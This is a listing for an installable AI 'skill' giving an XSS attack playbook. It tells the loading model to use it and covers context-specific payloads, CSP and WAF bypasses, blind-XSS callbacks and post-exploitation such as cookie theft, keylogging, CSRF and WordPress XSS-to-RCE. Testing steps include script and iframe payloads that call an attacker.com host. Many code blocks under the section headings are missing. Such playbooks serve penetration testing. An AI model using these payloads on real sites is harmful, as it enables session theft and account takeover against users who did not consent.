xss-cross-site-scripting
XSS playbook. Use when user-controlled content reaches HTML, attributes, JavaScript, DOM sinks, uploads, or multi-context rendering paths.
By yaklang · 3,271 installs
npx skills add yaklang/hack-skills --skill xss-cross-site-scripting
Source repository · Upstream listing
SKILL: Cross Site Scripting (XSS) — Expert Attack Playbook
AI LOAD INSTRUCTION : This skill covers non obvious XSS techniques, context specific payload selection, WAF bypass, CSP bypass, and post exploitation. Assume the reader already knows <script alert(1)</script — this file only covers what base models typically miss. For real world CVE cases, HttpOnly bypass strategies, XS Leaks side channels, and session fixation attacks, load the companion [SCENARIOS.md](./SCENARIOS.md).
0. RELATED ROUTING
Extended Scenarios
Also load [SCENARIOS.md](./SCENARIOS.md) when you need:
Django debug page XSS (CVE 2017 12794) — duplicate key error → unescaped exception → XSS
UTF 7 XSS for legacy IE environments ( +ADw script+AD4 )
HttpOnly bypass methodology — proxy the browser, session riding, CSRF via XSS
XS Leaks side channel attacks — timing oracle, cache probing, performance.now() measurement
Session fixation via XSS — pre set session ID before victim login
DOM clobbering techniques for CSP restricted environments
Advanced Tricks
Also load [ADVANCED XSS TRICKS.md](./ADVANCED XSS TRICKS.md) when you need:
mXSS / DOMPurify bypass — namespace confusion, <noscript parsing differential, form/table restructuring
DOM Clobbering — property override via id / name , HTMLCollection, deep property chains
Modern framework XSS — React dangerouslySetInnerHTML , Vue v html , Angular bypassSecurityTrust , Next.js SSR
Trusted Types bypass — default policy abuse, non TT sinks, policy passthrough
Service Worker XSS persistence — malicious SW registration, fetch interception, post patch survival
PDF/SVG/MathML XSS vectors, polyglot payloads, browser specific tricks
XS Leaks & side channels — timing oracle, frame counting, cache probing, error event oracle
Before broad payload spraying, you can first load:
[upload insecure files](../upload insecure files/SKILL.md) when you need the full upload path: validation, storage, preview, and sharing behavior
Quick context picks
Context First Pick Backup
HTML body <svg onload=alert(1) <img src=1 onerror=alert(1)
Quoted attribute " autofocus onfocus=alert(1)// " onmouseover=alert(1)//
JavaScript string ' alert(1) ' '</script <svg onload=alert(1)
URL / href sink javascript:alert(1) data:text/html,<svg onload=alert(1)
Tag body like title </title <svg onload=alert(1) </textarea <svg onload=alert(1)
SVG / XML sink <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/ XHTML namespace payload
1. INJECTION CONTEXT MATRIX
Identify context before picking a payload. Wrong context = wasted attempts.
Context Indicator Opener Payload
HTML outside tag <b INPUT</b <svg onload= <svg onload=alert(1)
HTML attribute value value="INPUT" " close attr "onmouseover=alert(1)//
Inline attr, no tag close Quoted, stripped Event injection "autofocus onfocus=alert(1)//
Block tag (title/script/textarea) <title INPUT</title Close tag first </title <svg onload=alert(1)
href / src / data / action link or form Protocol javascript:alert(1)
JS string (single quote) var x='INPUT' Break string ' alert(1) ' or ' alert(1)//
JS string with escape Backslash escaping Double escape \' alert(1)//
JS logical block Inside if/function Close + inject '}alert(1);{'
JS anywhere on page <script ...INPUT Break script </script <svg onload=alert(1)
XML page ( text/xml ) XML content type XML namespace <x:script xmlns:x="http://www.w3.org/1999/xhtml" alert(1)</x:script
2. MULTI REFLECTION ATTACKS
When input reflects in multiple places on the same page — single payload triggers from all points:
3. ADVANCED INJECTION VECTORS
DOM Insert Injection (when reflection is in DOM not source)
Input inserted via .innerHTML , document.write , jQuery .html() :
For URL controlled resource insertion:
PHP SELF Path Injection
When URL itself is reflected in form action :
Inject between .php and ? , using leading / .
File Upload XSS
Filename injection (when filename is reflected):
SVG upload (stored XSS via image upload accepting SVG):
Metadata injection (when EXIF is reflected):
postMessage XSS (no origin check)
When page has window.addEventListener('message', ...) without origin validation:
postMessage Origin Bypass
When origin IS checked but uses .includes() or prefix match:
Attacker controls facebook.com.ATTACKER.com subdomain.
XML Based XSS
Response has text/xml or application/xml :
Script Injection Without Closing Tag
When there IS a </script tag later in the page:
4. CSP BYPASS TECHNIQUES
JSONP Endpoint Bypass (allow listed domain has JSONP)
AngularJS CDN Bypass (allow listed ajax.googleapis.com )
Angular Expressions (server encodes HTML but AngularJS evaluates)
When {{1+1}} evaluates to 2 on page — classic CSTI indicator:
base uri Injection (CSP without base uri restriction)
Relative <script src=... loads from attacker's server.
DOM based via Dangling Markup
When CSP blocks script but allows img :
Leaks subsequent page content to attacker.
5. FILTER AND WAF BYPASS
Parameter Name Attack (WAF checks value not name)
When parameter names are reflected (e.g., in JSON output):
Payload is the parameter name , not value.
Encoding Chains
Test sequence: reflect → encoding behavior → identify filter logic → mutate.
Tag Mutation (blacklist bypass)
Fragmented Injection (strip tags bypass)
Filter strips <x ...</x :
Vectors Without Event Handlers
6. SECOND ORDER XSS
Definition : Input is stored (often normalized/HTML encoded), then later retrieved and inserted into DOM without re encoding.
Classic trigger payload (bypasses immediate HTML encoding):
Check: profile fields, display names, forum posts — anywhere data is stored, then re rendered in a different context (e.g., admin panel vs user facing).
Stored → Admin context XSS : most impactful — sign up with crafted username, wait for admin to view user list.
7. BLIND XSS METHODOLOGY
Every parameter that is not immediately reflected should be tested for blind XSS:
Contact forms, feedback fields
User agent / referer
Registration fields
Error log injections
Blind XSS callback payload (remote JS file approach):
Minimal collector (hosted at bxss.js ):
Use XSS Hunter or similar blind XSS platform for automated collection.
8. XSS EXPLOITATION CHAIN
Cookie Steal
Keylogger
CSRF via XSS (bypasses CSRF protection, reads CSRF token from DOM)
WordPress XSS → RCE (admin session + Hello Dolly plugin):
Browser Remote Control (JS command shell)
9. DECISION TREE
10. XSS TESTING PROCESS (ZSEANO METHOD)
1. Step 1 — Test non malicious tags: <h2 , <img , <table — are they reflected raw?
2. Step 2 — Test incomplete tags: <iframe src=//attacker.com/c= (no closing )
3. Step 3 — Encoding probes: <%00h2 , %0d , %0a , %09 , %253C
4. Step 4 — If filtering <script and onerror but NOT <script (without close): <script src=//attacker.com?c=
5. Step 5 — Blacklist check: does <svg work? Does <ScRiPt work?
6. Note: the same filter likely exists elsewhere — if they filter <script in search, do they filter it in file upload filename? In profile bio?
Key insight : Filter presence = vulnerability exists, developer tried to patch. Chase that thread across the entire application.